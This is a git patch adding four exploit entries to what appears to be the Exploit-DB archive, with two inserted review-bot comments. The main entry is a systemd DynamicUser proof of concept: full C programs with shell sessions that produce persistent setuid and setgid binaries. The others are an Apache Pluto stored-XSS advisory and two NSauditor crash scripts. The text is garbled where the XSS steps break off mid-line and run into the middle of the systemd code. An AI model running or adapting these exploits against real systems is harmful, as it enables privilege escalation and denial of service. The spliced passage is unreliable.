From be3b22b6f7af75fcbaef395812138e265bee4df5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 27 Apr 2019 05:02:04 +0000 Subject: [PATCH] DB: 2019-04-27 4 changes to exploits/shellcodes NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC) NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC) systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting --- exploits/java/webapps/46759.txt | 31 ++++ exploits/linux/dos/46760.txt | 305 ++++++++++++++++++++++++++++++++ exploits/windows/dos/46757.py | 22 +++ exploits/windows/dos/46758.py | 23 +++ files_exploits.csv | 4 + 5 files changed, 385 insertions(+) create mode 100644 exploits/java/webapps/46759.txt create mode 100644 exploits/linux/dos/46760.txt create mode 100755 exploits/windows/dos/46757.py create mode 100755 exploits/windows/dos/46758.py diff --git a/exploits/java/webapps/46759.txt b/exploits/java/webapps/46759.txt new file mode 100644 index 000000000..96a00e916 --- /dev/null +++ b/exploits/java/webapps/46759.txt 
@@ -0,0 +1,31 @@ +Exploit Title: Stored XSS +# Date: 25-04-2019 +# Exploit Author: Dhiraj Mishra +# Vendor Homepage: https://portals.apache.org/pluto +# Software Link: https://portals.apache.org/pluto/download.html +# Version: 3.0.0, 3.0.1 +# Tested on: Ubuntu 16.04 LTS +# CVE: CVE-2019-0186 +# References: +# https://nvd.nist.gov/vuln/detail/CVE-2019-0186 +# https://portals.apache.org/pluto/security.html +# https://www.inputzero.io/2019/04/apache-pluto-xss.html + +Summary: +The "Chat Room" portlet demo that ships with the Apache Pluto Tomcat bundle +contains a Cross-Site Scripting (XSS) vulnerability. Specifically, if an +attacker can input raw HTML markup into the "Name" or "Message" input +fields and submits the form, then the inputted HTML markup will be embedded +in the subsequent web page. + +Technical observation: +- Start the Apache Pluto Tomcat bundle +- Visit http://localhost:8080/pluto/portal/Chat%20Room%20Demo +- In the name field, enter: + cmsg_len != len || hdr->cmsg_level != SOL_SOCKET + || hdr->cmsg_type != SCM_RIGHTS) + errx(1, "got bad message"); + puts("got rootfd from other chroot..."); + if (fchdir(*(int*)CMSG_DATA(hdr))) err(1, "unable to change into real root"); + char curpath[4096]; + if (!getcwd(curpath, sizeof(curpath))) err(1, "unable to getpath()"); + printf("chdir successful, am now in %s\n", curpath); + + // create suid file + int src_fd = open("suid_src", O_RDONLY); + if (src_fd == -1) err(1, "open suid_src"); + int dst_fd = open("suid_dst", O_RDWR|O_CREAT|O_EXCL, 0644); + if (dst_fd == -1) err(1, "open suid_dst"); + + while (1) { + char buf[1000]; + ssize_t res = read(src_fd, buf, sizeof(buf)); + if (res == -1) err(1, "read"); + if (res == 0) break; + ssize_t res2 = write(dst_fd, buf, res); + if (res2 != res) err(1, "write"); + } + + if (fchmod(dst_fd, 04755)) err(1, "fchmod"); + close(src_fd); + close(dst_fd); + + // and that's it! 
+ puts("done!"); + while (1) pause(); + return 0; +} +user@deb10:~/systemd_uidleak$ gcc -o breakout_assisted breakout_assisted.c +user@deb10:~/systemd_uidleak$ cat > breakout_helper.c +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +int main(void) { + int rootfd = open(".", O_PATH); + if (rootfd < 0) err(1, "unable to open cwdfd"); + int s = socket(AF_UNIX, SOCK_DGRAM, 0); + if (s < 0) err(1, "unable to create unix domain socket"); + struct sockaddr_un addr = { + .sun_family = AF_UNIX, + .sun_path = "\0breakout" + }; + if (connect(s, (struct sockaddr *)&addr, sizeof(sa_family_t)+1+8)) + err(1, "unable to connect to abstract socket"); + puts("connected to other chroot, sending cwdfd..."); + + int len = sizeof(struct cmsghdr) + sizeof(int); + struct cmsghdr *hdr = alloca(len); + *hdr = (struct cmsghdr) { + .cmsg_len = len, + .cmsg_level = SOL_SOCKET, + .cmsg_type = SCM_RIGHTS + }; + *(int*)CMSG_DATA(hdr) = rootfd; + struct msghdr msg = { + .msg_control = hdr, + .msg_controllen = len + }; + if (sendmsg(s, &msg, 0) < 0) err(1, "unable to send fd"); + puts("all ok on this side!"); + return 0; +} +user@deb10:~/systemd_uidleak$ gcc -o breakout_helper breakout_helper.c +user@deb10:~/systemd_uidleak$ cp /usr/bin/id suid_src +user@deb10:~/systemd_uidleak$ chmod 0777 . +user@deb10:~/systemd_uidleak$ ls -la . +total 100 +drwxrwxrwx 2 user user 4096 Feb 4 21:22 . +drwxr-xr-x 23 user user 4096 Feb 4 21:19 .. 
+-rwxr-xr-x 1 user user 17432 Feb 4 21:20 breakout_assisted +-rw-r--r-- 1 user user 1932 Feb 4 21:20 breakout_assisted.c +-rwxr-xr-x 1 user user 16872 Feb 4 21:22 breakout_helper +-rw-r--r-- 1 user user 1074 Feb 4 21:22 breakout_helper.c +-rwxr-xr-x 1 user user 43808 Feb 4 21:22 suid_src +user@deb10:~/systemd_uidleak$ +====================================================================== + +Then, as root, create and launch a service around breakout_assisted: +====================================================================== +root@deb10:/home/user# cat > /etc/systemd/system/dynamic-user-test.service +[Service] +ExecStart=/home/user/systemd_uidleak/breakout_assisted +DynamicUser=yes +root@deb10:/home/user# systemctl daemon-reload +root@deb10:/home/user# systemctl start dynamic-user-test.service +root@deb10:/home/user# systemctl status dynamic-user-test.service +[...] +Feb 04 21:27:29 deb10 systemd[1]: Started dynamic-user-test.service. +Feb 04 21:27:29 deb10 breakout_assisted[3155]: waiting for connection from outside the service... +root@deb10:/home/user# +====================================================================== + +Now again as a user, run the breakout_helper: +====================================================================== +user@deb10:~/systemd_uidleak$ ./breakout_helper +connected to other chroot, sending cwdfd... +all ok on this side! +user@deb10:~/systemd_uidleak$ ls -la +total 144 +drwxrwxrwx 2 user user 4096 Feb 4 21:28 . +drwxr-xr-x 23 user user 4096 Feb 4 21:19 .. 
+-rwxr-xr-x 1 user user 17432 Feb 4 21:20 breakout_assisted +-rw-r--r-- 1 user user 1932 Feb 4 21:20 breakout_assisted.c +-rwxr-xr-x 1 user user 16872 Feb 4 21:22 breakout_helper +-rw-r--r-- 1 user user 1074 Feb 4 21:22 breakout_helper.c +-rwsr-xr-x 1 64642 64642 43808 Feb 4 21:28 suid_dst +-rwxr-xr-x 1 user user 43808 Feb 4 21:22 suid_src +user@deb10:~/systemd_uidleak$ ./suid_dst +uid=1000(user) gid=1000(user) euid=64642 groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner) +user@deb10:~/systemd_uidleak$ +====================================================================== + + +On fixing this: + +catern suggested that it might be more robust to use seccomp() to block +chmod()/fchmod() calls with modes that include setuid/setgid bits, like the +Nix build process. See +: + +> To prevent this issue, Nix now disallows builders to create setuid and setgid +> binaries. On Linux, this is done using a seccomp BPF filter. + +This seems like the least intrusive fix to me. As far as I can tell, it should +be sufficient to prevent the creation of setuid binaries that are reachable +beyond the death of the service. 
Unfortunately, for setgid files, the following +trick also needs to be mitigated, assuming that the distribution hasn't blocked +the unprivileged creation of user namespaces: + +====================================================================== +user@deb10:~/systemd_uidleak_gid$ cat map_setter.c +#include +#include +#include +#include +#include +#include + +static void write_file(char *type, int pid, char *buf) { + char file_path[100]; + sprintf(file_path, "/proc/%d/%s", pid, type); + int fd = open(file_path, O_WRONLY); + if (fd == -1) err(1, "open %s", file_path); + if (write(fd, buf, strlen(buf)) != strlen(buf)) + err(1, "write %s", type); + close(fd); +} + +static void write_map(char *type, int pid, int upper, int lower) { + char buf[100]; + sprintf(buf, "%d %d 1", upper, lower); + write_file(type, pid, buf); +} + +int main(void) { + FILE *pid_file = fopen("/home/user/systemd_uidleak_gid/pid_file", "r"); + if (pid_file == NULL) err(1, "open pid_file"); + int pid; + if (fscanf(pid_file, "%d", &pid) != 1) err(1, "fscanf"); + + write_file("setgroups", pid, "deny"); + write_map("gid_map", pid, 0, getgid()); + write_map("uid_map", pid, 0, geteuid()); + puts("done"); + while (1) pause(); + return 0; +} +user@deb10:~/systemd_uidleak_gid$ cat sgid_maker.c +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +int main(void) { + if (unshare(CLONE_NEWUSER)) err(1, "unshare CLONE_NEWUSER"); + pid_t my_pid = getpid(); + char my_pid_str[20]; + sprintf(my_pid_str, "%d\n", (int)my_pid); + int pid_file = open("pid_file", O_WRONLY|O_CREAT|O_TRUNC, 0644); + if (pid_file == -1) err(1, "create pid_file"); + if (write(pid_file, my_pid_str, strlen(my_pid_str)) != strlen(my_pid_str)) err(1, "write pid_file"); + close(pid_file); + puts("pid file written, waiting for mappings..."); + while (1) { + if (getuid() == 0) break; + sleep(1); + } + puts("mappings are up!"); + if (setgid(0)) err(1, "setgid"); + + // create sgid file + int src_fd = 
open("sgid_src", O_RDONLY); + if (src_fd == -1) err(1, "open sgid_src"); + int dst_fd = open("sgid_dst", O_RDWR|O_CREAT|O_EXCL, 0644); + if (dst_fd == -1) err(1, "open sgid_dst"); + while (1) { + char buf[1000]; + ssize_t res = read(src_fd, buf, sizeof(buf)); + if (res == -1) err(1, "read"); + if (res == 0) break; + ssize_t res2 = write(dst_fd, buf, res); + if (res2 != res) err(1, "write"); + } + if (fchmod(dst_fd, 02755)) err(1, "fchmod"); + close(src_fd); + close(dst_fd); +} +user@deb10:~/systemd_uidleak_gid$ cp /usr/bin/id sgid_src +user@deb10:~/systemd_uidleak_gid$ gcc -o map_setter map_setter.c && gcc -o sgid_maker sgid_maker.c && chmod u+s map_setter && ./sgid_maker +pid file written, waiting for mappings... +[##### at this point, launch ~/systemd_uidleak_gid/map_setter in a systemd service #####] +mappings are up! +user@deb10:~/systemd_uidleak_gid$ ls -l sgid_dst +-rwxr-sr-x 1 user 64642 43808 Feb 4 23:13 sgid_dst +user@deb10:~/systemd_uidleak_gid$ ./sgid_dst +uid=1000(user) gid=1000(user) egid=64642 groups=64642,24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),1000(user) +user@deb10:~/systemd_uidleak_gid$ +====================================================================== + +I think the least intrusive way to mitigate this part might be to enforce +NoNewPrivileges=yes for services with dynamic IDs - that way, someone inside +such a service can't become capable over anything outside, and someone outside +the service can't become capable over anything inside the service. +(And really, in general, it would be nice if NoNewPrivileges=yes could become +the norm at some point.) \ No newline at end of file diff --git a/exploits/windows/dos/46757.py b/exploits/windows/dos/46757.py new file mode 100755 index 000000000..ab86172d0 --- /dev/null +++ b/exploits/windows/dos/46757.py 
@@ -0,0 +1,22 @@
+#Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: www.nsauditor.com
+#Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+#Tested Version: 3.1.2.0
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Nsauditor_3.1.2.0.py
+#2.- Open nsauditor.txt and copy content to clipboard
+#3.- Open Nsauditor
+#4.- In Sessions select "SNMP Auditor"
+#5.- Select "Community" field paste Clipboard
+#6.- Click "Walk"
+#7.- Crarshed
+
+cod = "\x41" * 10000
+
+f = open('nsauditor.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46758.py b/exploits/windows/dos/46758.py
new file mode 100755
index 000000000..98df8c83f
--- /dev/null
+++ b/exploits/windows/dos/46758.py
@@ -0,0 +1,23 @@
+#Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-24
+#Vendor Homepage: www.nsauditor.com
+#Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+#Tested Version: 3.1.2.0
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Nsauditor_name.py
+#2.- Open nsauditor_name.txt and copy content to clipboard
+#3.- Open Nsauditor
+#4.- Select "Register"
+#5.- In "Name" paste Clipboard
+#6.- In Key type "test"
+#7.- Click "Ok"
+#8.- Crarshed
+
+cod = "\x41" * 300
+
+f = open('nsauditor_name.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50b42553c..719caa22d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
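Review bot: Both new scripts open the output file with a bare `open()`/`close()` pair, so an exception raised by `f.write(cod)` leaves the handle unclosed; the idiomatic form is `with open('nsauditor.txt', 'w') as f:` followed by an indented `f.write(cod)` (with `'nsauditor_name.txt'` in 46758.py), which closes the file on every path. The same pattern appears in both 46757.py and 46758.py, so this note covers both hunks. The step-1 comment in each file names a script (`Nsauditor_3.1.2.0.py`, `Nsauditor_name.py`) that differs from the committed filename, presumably an artifact of renaming on import; a reader following the steps would look for a file that does not exist in this tree, so `#1.- Run this script` would avoid the mismatch. The last step in each file reads `Crarshed`, a typo for `Crashed`.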
@@ -6402,6 +6402,9 @@ id,file,description,date,author,type,platform,port
 46750,exploits/windows/dos/46750.py,"Backup Key Recovery 2.2.4 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows,
 46752,exploits/hardware/dos/46752.txt,"JioFi 4G M2S 1.0.2 - Denial of Service",2019-04-25,"Vikas Chaudhary",dos,hardware,
 46754,exploits/windows/dos/46754.py,"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)",2019-04-25,Achilles,dos,windows,
+46757,exploits/windows/dos/46757.py,"NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
+46758,exploits/windows/dos/46758.py,"NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
+46760,exploits/linux/dos/46760.txt,"systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process",2019-04-26,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41189,3 +41192,4 @@ id,file,description,date,author,type,platform,port
 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80
 46751,exploits/hardware/webapps/46751.txt,"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting",2019-04-25,"Vikas Chaudhary",webapps,hardware,
 46753,exploits/php/webapps/46753.txt,"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion",2019-04-25,AkkuS,webapps,php,80
+46759,exploits/java/webapps/46759.txt,"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting",2019-04-26,"Dhiraj Mishra",webapps,java,
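Review bot: The added `46760` row indexes the systemd DynamicUser advisory with type `dos` under `exploits/linux/dos/`, while the row's own title describes a setuid binary being created and outliving the service, which is a local privilege-escalation outcome rather than a denial of service; the adjacent rows for that class use `local` with an `exploits/linux/local/` path (e.g. `3,exploits/linux/local/3.c`). Misfiling matters for anyone triaging the index by type, since a `dos` filter hides a persistence-of-privilege issue. If the type is corrected, the path in the row, the diffstat and the on-disk location must change together, because the row and the path encode the same classification. The three new rows carry `2019-04-26` while the advisory headers give discovery dates of `2019-04-24` and `25-04-2019`; this is presumably the index's publication-date convention, but it is worth confirming rather than assuming.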